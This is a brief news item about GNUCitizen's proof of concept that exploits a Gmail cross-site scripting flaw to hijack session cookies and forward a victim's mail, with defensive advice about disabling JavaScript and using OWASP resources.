www.my10sen.com

Ethical hacking group GNUCitizen has developed a proof-of-concept program to steal contacts and incoming e-mails from Google Gmail users. This flaw can be used to forward all your incoming e-mail as a proof of concept and demonstrate the potential to use this vulnerability for malicious purposes.


Attackers could compromise a Gmail account using a cross-site scripting vulnerability if the victim is logged in and clicks on a malicious link. The attacker can take over the session cookies for Gmail and subsequently forward all the account’s messages to a POP account. The problem is potentially compounded by Google’s policy of retaining cookies for two years. The obvious risk is to the home user, many organizations could be exposed, since they do not filter employee e-mails sent from work to personal accounts.

One work-around is to use Gmail through Firefox and disable JavaScript. While this limits user access to many components of popular Web sites, it will protect against the potential threat. Developers at many large enterprises are not aware of the power of cross-site scripting. It is advisable resources such as the Open Web Application Security Project, or OWASP, which offers free tools to help write secure code and allow testing for XSS vulnerabilities.